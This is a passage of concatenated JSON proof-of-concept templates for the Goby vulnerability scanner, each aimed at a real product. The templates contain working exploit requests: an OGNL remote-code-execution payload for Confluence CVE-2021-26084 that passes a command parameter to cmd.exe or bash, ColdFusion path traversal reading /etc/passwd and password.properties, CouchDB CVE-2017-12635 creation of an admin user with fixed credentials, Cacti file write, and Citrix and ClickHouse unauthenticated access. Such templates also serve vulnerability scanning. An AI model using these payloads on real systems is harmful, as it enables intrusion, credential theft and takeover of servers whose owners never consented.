73 | "SetVariable": [ 74 | "output|lastbody|regex|" 75 | ] 76 | }, 77 | { 78 | "Request": { 79 | "method": "GET", 80 | "uri": "http://www.dnslog.cn/getrecords.php", 81 | "follow_redirect": false, 82 | "header": null, 83 | "data_type": "text", 84 | "data": "", 85 | "set_variable": [] 86 | }, 87 | "ResponseTest": { 88 | "type": "group", 89 | "operation": "AND", 90 | "checks": [ 91 | { 92 | "type": "item", 93 | "variable": "$code", 94 | "operation": "==", 95 | "value": "200", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "{{{dnstest}}}", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "ExploitSteps": [ 113 | "AND", 114 | { 115 | "Request": { 116 | "method": "POST", 117 | "uri": "/graphql", 118 | "follow_redirect": false, 119 | "header": null, 120 | "data_type": "text", 121 | "data": "{\"query\":\"{{{cmd}}}\",\"variables\":{\"duration\":{\"start\":\"2021-12-22 1259\",\"end\":\"2021-12-22 1314\",\"step\":\"MINUTE\"}}}", 122 | "set_variable": [] 123 | }, 124 | "ResponseTest": { 125 | "type": "group", 126 | "operation": "AND", 127 | "checks": [] 128 | }, 129 | "SetVariable": [ 130 | "output|lastbody|regex|" 131 | ] 132 | } 133 | ], 134 | "PostTime": "2022-01-05 13:47:56", 135 | "GobyVersion": "1.9.320" 136 | } -------------------------------------------------------------------------------- /Aspcms_Backend_Leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Aspcms Backend Leak", 3 | "Level": "2", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"ASPCMS\"", 8 | "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", 9 | "Product": "ASPCMS", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

leaks the backend URL

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/plug/oem/AspCms_OEMFun.asp", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "alert(", 49 | "bz": "" 50 | } 51 | ] 52 | }, 53 | "SetVariable": [ 54 | "output|lastbody|regex|top.location.href='(.*?)'" 55 | ] 56 | }, 57 | { 58 | "Request": { 59 | "method": "GET", 60 | "uri": "{{{output}}}", 61 | "follow_redirect": true, 62 | "header": null, 63 | "data_type": "text", 64 | "data": "", 65 | "set_variable": [] 66 | }, 67 | "ResponseTest": { 68 | "type": "group", 69 | "operation": "AND", 70 | "checks": [ 71 | { 72 | "type": "item", 73 | "variable": "$code", 74 | "operation": "==", 75 | "value": "200", 76 | "bz": "" 77 | }, 78 | { 79 | "type": "item", 80 | "variable": "$body", 81 | "operation": "contains", 82 | "value": "username", 83 | "bz": "" 84 | } 85 | ] 86 | }, 87 | "SetVariable": [ 88 | "output|lastbody||" 89 | ] 90 | } 91 | ], 92 | "ExploitSteps": [ 93 | "AND", 94 | { 95 | "Request": { 96 | "method": "GET", 97 | "uri": "/plug/oem/AspCms_OEMFun.asp", 98 | "follow_redirect": false, 99 | "header": null, 100 | "data_type": "text", 101 | "data": "", 102 | "set_variable": [] 103 | }, 104 | "ResponseTest": { 105 | "type": "group", 106 | "operation": "AND", 107 | "checks": [ 108 | { 109 | "type": "item", 110 | "variable": "$code", 111 | "operation": "==", 112 | "value": "200", 113 | "bz": "" 114 | }, 115 | { 116 | "type": "item", 117 | "variable": 
"$body", 118 | "operation": "contains", 119 | "value": "alert(", 120 | "bz": "" 121 | } 122 | ] 123 | }, 124 | "SetVariable": [ 125 | "output|lastbody|regex|top.location.href='(.*?)'" 126 | ] 127 | } 128 | ], 129 | "PostTime": "2021-11-02 20:50:45", 130 | "GobyVersion": "1.8.302" 131 | } -------------------------------------------------------------------------------- /Cacti_Weathermap_File_Write.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Cacti Weathermap File Write", 3 | "Level": "3", 4 | "Tags": [ 5 | "getshell" 6 | ], 7 | "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", 8 | "Description": "allows remote attackers to upload and execute arbitrary files", 9 | "Product": "cacti-监控系统", 10 | "Homepage": "https://www.cacti.net/", 11 | "Author": "aetkrad", 12 | "Impact": "

A remote attacker can use this to replace web application files with malicious code and achieve remote code execution on the system.

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/plugins/weathermap/editor.php?plug=0&mapname={{{str1}}}.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [ 32 | "str1|rand|str|7" 33 | ] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [ 49 | "output|lastbody|regex|" 50 | ] 51 | }, 52 | { 53 | "Request": { 54 | "method": "GET", 55 | "uri": "/plugins/weathermap/configs/test.php", 56 | "follow_redirect": false, 57 | "header": null, 58 | "data_type": "text", 59 | "data": "", 60 | "set_variable": [] 61 | }, 62 | "ResponseTest": { 63 | "type": "group", 64 | "operation": "AND", 65 | "checks": [ 66 | { 67 | "type": "item", 68 | "variable": "$code", 69 | "operation": "==", 70 | "value": "200", 71 | "bz": "" 72 | }, 73 | { 74 | "type": "item", 75 | "variable": "$body", 76 | "operation": "contains", 77 | "value": "46ea1712d4b13b55b3f680cc5b8b54e8", 78 | "bz": "" 79 | } 80 | ] 81 | }, 82 | "SetVariable": [ 83 | "output|lastbody|regex|" 84 | ] 85 | } 86 | ], 87 | "ExploitSteps": [ 88 | "AND", 89 | { 90 | "Request": { 91 | "method": "GET", 92 | "uri": "/test.php", 93 | "follow_redirect": true, 94 | "header": 
null, 95 | "data_type": "text", 96 | "data": "", 97 | "set_variable": [] 98 | }, 99 | "ResponseTest": { 100 | "type": "group", 101 | "operation": "AND", 102 | "checks": [ 103 | { 104 | "type": "item", 105 | "variable": "$code", 106 | "operation": "==", 107 | "value": "200", 108 | "bz": "" 109 | }, 110 | { 111 | "type": "item", 112 | "variable": "$body", 113 | "operation": "contains", 114 | "value": "test", 115 | "bz": "" 116 | } 117 | ] 118 | }, 119 | "SetVariable": [ 120 | "output|lastbody|regex|" 121 | ] 122 | } 123 | ], 124 | "PostTime": "2021-11-05 13:30:24", 125 | "GobyVersion": "1.8.302" 126 | } -------------------------------------------------------------------------------- /Citrix_Unauthorized_CVE_2020_8193.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Citrix Unauthorized CVE-2020-8193", 3 | "Level": "3", 4 | "Tags": [ 5 | "Unauthorized" 6 | ], 7 | "GobyQuery": "(app=\"citrix-公司产品\" | title=\"Citrix Login\" | body=\"Citrix ADC\")", 8 | "Description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints", 9 | "Product": "citrix", 10 | "Homepage": "https://www.citrix.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "POST", 26 | "uri": "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1", 27 | "follow_redirect": false, 28 | "header": { 29 | "Content-Type": "application/xml", 30 | "X-NITRO-PASS": "{{{str1}}}", 31 | "X-NITRO-USER": "{{{str2}}}" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [ 36 | 
"str2|rand|str|8", 37 | "str1|rand|str|8" 38 | ] 39 | }, 40 | "ResponseTest": { 41 | "type": "group", 42 | "operation": "AND", 43 | "checks": [ 44 | { 45 | "type": "item", 46 | "variable": "$code", 47 | "operation": "==", 48 | "value": "406", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$head", 54 | "operation": "contains", 55 | "value": "SESSID=", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "ExploitSteps": [ 66 | "AND", 67 | { 68 | "Request": { 69 | "method": "GET", 70 | "uri": "/test.php", 71 | "follow_redirect": true, 72 | "header": null, 73 | "data_type": "text", 74 | "data": "", 75 | "set_variable": [] 76 | }, 77 | "ResponseTest": { 78 | "type": "group", 79 | "operation": "AND", 80 | "checks": [ 81 | { 82 | "type": "item", 83 | "variable": "$code", 84 | "operation": "==", 85 | "value": "200", 86 | "bz": "" 87 | }, 88 | { 89 | "type": "item", 90 | "variable": "$body", 91 | "operation": "contains", 92 | "value": "test", 93 | "bz": "" 94 | } 95 | ] 96 | }, 97 | "SetVariable": [ 98 | "output|lastbody|regex|" 99 | ] 100 | } 101 | ], 102 | "PostTime": "2021-11-06 14:18:50", 103 | "GobyVersion": "1.8.302" 104 | } -------------------------------------------------------------------------------- /ClickHouse_SQLI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ClickHouse SQLI", 3 | "Level": "3", 4 | "Tags": [ 5 | "sqli" 6 | ], 7 | "GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")", 8 | "Description": "ClickHouse 存在着的接口由于没有鉴权,则任意访问者都可以执行SQL语句获取数据.", 9 | "Product": "ClickHouse", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 
25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/ping", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$head", 49 | "operation": "contains", 50 | "value": "X-Clickhouse-Summary", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | }, 59 | { 60 | "Request": { 61 | "method": "GET", 62 | "uri": "/?query=SHOW%20DATABASES", 63 | "follow_redirect": false, 64 | "header": null, 65 | "data_type": "text", 66 | "data": "", 67 | "set_variable": [] 68 | }, 69 | "ResponseTest": { 70 | "type": "group", 71 | "operation": "AND", 72 | "checks": [ 73 | { 74 | "type": "item", 75 | "variable": "$code", 76 | "operation": "==", 77 | "value": "200", 78 | "bz": "" 79 | }, 80 | { 81 | "type": "item", 82 | "variable": "$body", 83 | "operation": "contains", 84 | "value": "default", 85 | "bz": "" 86 | }, 87 | { 88 | "type": "item", 89 | "variable": "$body", 90 | "operation": "contains", 91 | "value": "system", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody|regex|" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-12-04 18:32:14", 102 | "GobyVersion": "1.9.310" 103 | } -------------------------------------------------------------------------------- /Coldfusion_LFI_CVE_2010_2861.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Coldfusion LFI CVE-2010-2861", 3 | "Level": "2", 4 | "Tags": [ 5 | "lfi" 6 | ], 7 | "GobyQuery": "app=\"Adobe-ColdFusion\"", 8 | "Description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary 
files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.", 9 | "Product": "Adobe ColdFusion", 10 | "Homepage": "https://www.adobe.com/products/coldfusion-family.html", 11 | "Author": "aetkrad", 12 | "Impact": "

Allows remote attackers to read arbitrary files.

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "Name": "Filepath", 19 | "Type": "select", 20 | "Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en" 21 | } 22 | ], 23 | "ExpTips": { 24 | "Type": "", 25 | "Content": "" 26 | }, 27 | "ScanSteps": [ 28 | "AND", 29 | { 30 | "Request": { 31 | "method": "GET", 32 | "uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", 33 | "follow_redirect": true, 34 | "header": null, 35 | "data_type": "text", 36 | "data": "", 37 | "set_variable": [] 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$body", 53 | "operation": "contains", 54 | "value": "rdspassword=", 55 | "bz": "" 56 | }, 57 | { 58 | "type": "item", 59 | "variable": "$body", 60 | "operation": "contains", 61 | "value": "encrypted=", 62 | "bz": "" 63 | } 64 | ] 65 | }, 66 | "SetVariable": [ 67 | "output|lastbody|regex|" 68 | ] 69 | } 70 | ], 71 | "ExploitSteps": [ 72 | "AND", 73 | { 74 | "Request": { 75 | "method": "GET", 76 | "uri": "/CFIDE/administrator/enter.cfm?locale={{{cmd}}}", 77 | "follow_redirect": true, 78 | "header": null, 79 | "data_type": "text", 80 | "data": "", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "200", 92 | "bz": "" 93 | } 94 | ] 95 | }, 96 | "SetVariable": [ 97 | "output|lastbody||" 98 | ] 99 | } 100 | ], 101 | "PostTime": "2021-11-08 15:51:21", 102 | "GobyVersion": "1.8.302" 103 | } -------------------------------------------------------------------------------- /Confluence_RCE_CVE_2021_26084.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "Name": "Confluence RCE(CVE-2021-26084)", 3 | "Level": "3", 4 | "Tags": [ 5 | "RCE" 6 | ], 7 | "GobyQuery": "product=\"Confluence\"", 8 | "Description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", 9 | "Product": "Atlassian Confluence", 10 | "Homepage": "https://www.atlassian.com/zh/software/confluence", 11 | "Author": "aetkrad", 12 | "Impact": "

Allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084" 16 | ], 17 | "HasExp":true, 18 | "ExpParams":[ 19 | { 20 | "name":"cmd", 21 | "type":"input", 22 | "value":"whoami", 23 | "show":"" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "POST", 31 | "uri": "/pages/doenterpagevariables.action", 32 | "follow_redirect": false, 33 | "header": { 34 | "Content-Type": "application/x-www-form-urlencoded" 35 | }, 36 | "data_type": "text", 37 | "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027echo workwork\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027echo workwork\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027" 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$body", 53 | "operation": "contains", 54 | "value": "workwork", 55 | "bz": "" 56 | } 57 | ] 58 | }, 59 | "SetVariable": [] 60 | } 61 | ], 62 | "ExploitSteps":[ 63 | "AND", 64 | { 65 | "Request": { 66 | "method": "POST", 67 | "uri": "/pages/doenterpagevariables.action", 68 | "follow_redirect": false, 69 | "header": { 70 | "Content-Type": "application/x-www-form-urlencoded" 71 | }, 72 | "data_type": "text", 73 | "data": 
"queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027{{{cmd}}}\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027{{{cmd}}}\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027" 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|value=\"{([\\s\\S]*)=null}\"" 77 | ] 78 | } 79 | ], 80 | "PostTime": "2021-10-27 13:33:02", 81 | "GobyVersion": "1.8.294" 82 | } -------------------------------------------------------------------------------- /Consul_Rexec_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Consul Rexec RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "protocol=\"consul(http)\"", 8 | "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request", 9 | "Product": "Consul", 10 | "Homepage": "https://www.consul.io/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.exploit-db.com/exploits/46073" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/v1/agent/self", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | 
"variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "\"DisableRemoteExec\":false", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | } 59 | ], 60 | "PostTime": "2021-11-08 21:46:25", 61 | "GobyVersion": "1.8.302" 62 | } -------------------------------------------------------------------------------- /Couch_CMS_Infoleak_CVE_2018_7662.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couch CMS Infoleak CVE-2018-7662", 3 | "Level": "3", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "(title=\"CouchCMS\" | body=\"Powered by CouchCMS\")", 8 | "Description": "Couch through 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php", 9 | "Product": "Couch cms", 10 | "Homepage": "https://www.couchcms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/includes/mysql2i/mysql2i.func.php", 27 | "follow_redirect": false, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "mysql2i.func.php on line 10", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "Fatal error: Cannot redeclare 
mysql_affected_rows() in", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody||" 62 | ] 63 | }, 64 | { 65 | "Request": { 66 | "method": "GET", 67 | "uri": "/addons/phpmailer/phpmailer.php", 68 | "follow_redirect": false, 69 | "header": null, 70 | "data_type": "text", 71 | "data": "", 72 | "set_variable": [] 73 | }, 74 | "ResponseTest": { 75 | "type": "group", 76 | "operation": "AND", 77 | "checks": [ 78 | { 79 | "type": "item", 80 | "variable": "$code", 81 | "operation": "==", 82 | "value": "200", 83 | "bz": "" 84 | }, 85 | { 86 | "type": "item", 87 | "variable": "$body", 88 | "operation": "contains", 89 | "value": "phpmailer.php on line 10", 90 | "bz": "" 91 | }, 92 | { 93 | "type": "item", 94 | "variable": "$body", 95 | "operation": "contains", 96 | "value": "Fatal error: Call to a menber function add_event_listener() on a non-object in", 97 | "bz": "" 98 | } 99 | ] 100 | }, 101 | "SetVariable": [ 102 | "output|lastbody||" 103 | ] 104 | } 105 | ], 106 | "PostTime": "2021-11-09 19:56:42", 107 | "GobyVersion": "1.8.302" 108 | } -------------------------------------------------------------------------------- /Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couchdb Add User Not Authorized CVE-2017-12635", 3 | "Level": "3", 4 | "Tags": [ 5 | "Ultra vires" 6 | ], 7 | "GobyQuery": "app=\"APACHE-CouchDB\"", 8 | "Description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. 
The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", 9 | "Product": "APACHE-CouchDB", 10 | "Homepage": "http://couchdb.apache.org", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "Name": "创建用户", 19 | "Type": "select", 20 | "Value": "CanIHelpYou:NoThank" 21 | } 22 | ], 23 | "ExpTips": { 24 | "Type": "", 25 | "Content": "" 26 | }, 27 | "ScanSteps": [ 28 | "AND", 29 | { 30 | "Request": { 31 | "method": "PUT", 32 | "uri": "/_users/org.couchdb.user:{{{str1}}}", 33 | "follow_redirect": false, 34 | "header": { 35 | "Content-Type": "application/json" 36 | }, 37 | "data_type": "text", 38 | "data": " {\n \"type\": \"user\",\n \"name\": \"{{{str1}}}\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"{{{str2}}}\"\n }", 39 | "set_variable": [ 40 | "str1|rand|str|32", 41 | "str2|rand|str|64" 42 | ] 43 | }, 44 | "ResponseTest": { 45 | "type": "group", 46 | "operation": "AND", 47 | "checks": [ 48 | { 49 | "type": "item", 50 | "variable": "$code", 51 | "operation": "==", 52 | "value": "201", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "org.couchdb.user:{{{r1}}}", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody||" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "PUT", 74 | "uri": "/_users/org.couchdb.user:CanIHelpYou", 75 | "follow_redirect": false, 76 | "header": { 77 | "Content-Type": "application/json" 78 | }, 79 | "data_type": "text", 80 | "data": " {\n \"type\": \"user\",\n \"name\": 
\"CanIHelpYou\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"NoThank\"\n }", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "201", 92 | "bz": "" 93 | }, 94 | { 95 | "type": "item", 96 | "variable": "$body", 97 | "operation": "contains", 98 | "value": "org.couchdb.user:CanIHelpYou", 99 | "bz": "" 100 | } 101 | ] 102 | }, 103 | "SetVariable": [ 104 | "output|lastbody||" 105 | ] 106 | } 107 | ], 108 | "PostTime": "2021-11-10 19:52:21", 109 | "GobyVersion": "1.8.302" 110 | } -------------------------------------------------------------------------------- /Couchdb_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couchdb Unauth", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"APACHE-CouchDB\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-CouchDB", 10 | "Homepage": "http://couchdb.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

Allows remote attackers to execute arbitrary code

", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.seebug.org/vuldb/ssvid-91597" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/_config", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "httpd_design_handlers", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "external_manager", 58 | "bz": "" 59 | }, 60 | { 61 | "type": "item", 62 | "variable": "$body", 63 | "operation": "contains", 64 | "value": "replicator_manager", 65 | "bz": "" 66 | } 67 | ] 68 | }, 69 | "SetVariable": [ 70 | "output|lastbody|regex|" 71 | ] 72 | } 73 | ], 74 | "PostTime": "2021-11-10 20:27:45", 75 | "GobyVersion": "1.8.302" 76 | } -------------------------------------------------------------------------------- /CraftCMS_Seomatic_RCE_CVE_2020_9597.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "CraftCMS Seomatic RCE CVE-2020-9597", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(title==\"Welcome to Craft CMS\" | body=\"href=\\\"http://craftcms.com/\\\"\" | body=\"SEOmatic\" | header=\"Craft CMS\" | header=\"Craft CMS, SEOmatic\")", 8 | "Description": "The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.", 9 | "Product": "craftcms", 10 | "Homepage": "https://craftcms.com/", 11 